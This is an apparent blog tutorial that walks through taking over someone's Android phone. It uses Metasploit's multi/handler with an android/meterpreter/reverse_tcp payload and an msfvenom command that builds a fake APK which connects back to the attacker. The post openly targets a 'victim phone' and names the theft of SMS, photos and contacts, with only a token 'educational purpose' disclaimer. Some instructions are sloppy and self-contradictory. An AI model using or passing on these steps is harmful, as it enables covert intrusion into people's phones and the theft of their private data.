Hello everyone, In this tutorial i will tell u the best way on how to get into any Android Smart Phone. The tool that we will be using today is called Metasploit. But in this case we are going to use it on Linux, which is way diffrent than the Windows version.
If you don’t have any of the above operating systems (Parrot OS/ Kali Linux), you can use any of the above system, without installing or using any virtual box.
To get started you will need to have Metasploit tool, which comes as default tool, you can open it by going to Parrot tools, or Applications->Parrot->Exploitations Tools->Metasploit Framewrok->metasploit framework. To open it you will need to enter your root details, and then a new terminal will open.
U have to do like this is showing in this Picture :-
After that, you have to set up the exploitand the payload, which can be done by using this command in the terminal above:
use exploit/multi/handler
Then type this code to set up the payload (In the same terminal you just used the command above)
set payload android/meterpreter/reverse_tcp
Now we need to set up the local ip address, if you don’t know it, open a new terminal (don’t close the last one) and type:
hostname -I
You should see your ip address right after the code, go to the previous terminal and let’s set up the local host, this is the code:
set LHOST zyx.yxz.xyz
Replace (zyx.yxz.xyz) with the ip address you got on the above step. But in order for this trick to work, you should have configured your port before.
To finish it, type exploit , but don’t close the terminal yet.
Now we have to make an android application so it can be installed on the phone you want to get into. As we all know android uses .apk files, so let’s create one.
Open a new terminal, and type sudo su, which will ask you for root password. Next, create the fake application by using this command:
msfvenom -p android/meterpreter/reverse_tcp LHOST=zyx.yxz.xyz LPORT=4444 R > appname.apk
#Don’t forget to change zyx.yxz.xyz to your local host and the application name in whatever you want.
You can find the application you just created on your home folder. This apk should be installed on the victim phone so you can get into it, this is the only hard part of this tutorial. You should not close the terminal though, once your application is installed on your victim’s phone, it will give you some basic information.
There are many features of this tool that you can use to get sms, pictures, contacts etc, if you want to know any other command just type help in the terminal and you will see all the available codes that you can use.
Note## This trick is just for educational purpose only, we don’t want you to harm any person out there. Use it at your own risk as i am not responsible what you do.
No comments:
Post a Comment